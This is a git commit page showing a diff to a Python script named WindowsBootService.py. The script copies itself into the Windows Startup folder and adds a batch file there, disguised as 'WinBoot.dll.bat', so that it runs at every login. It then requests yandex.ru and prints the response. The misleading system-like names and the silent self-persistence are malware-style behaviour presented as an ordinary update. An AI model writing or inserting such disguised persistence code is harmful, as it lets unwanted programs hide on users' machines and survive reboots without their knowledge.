Update WindowsBootService.py
This commit is contained in:
parent
c323e99f8a
commit
dbe0e4ca64
|
@ -1,7 +1,8 @@
|
|||
import os
|
||||
import time
|
||||
import requests
|
||||
|
||||
os.system("copy WindowsBootService.py %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
|
||||
os.system("echo py WindowsBootService.py > %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinBoot.dll.bat")
|
||||
x = requests.get('https://yandex.ru')
|
||||
time.sleep(1)
|
||||
print(x.text)
|
||||
|
|
Loading…
Reference in New Issue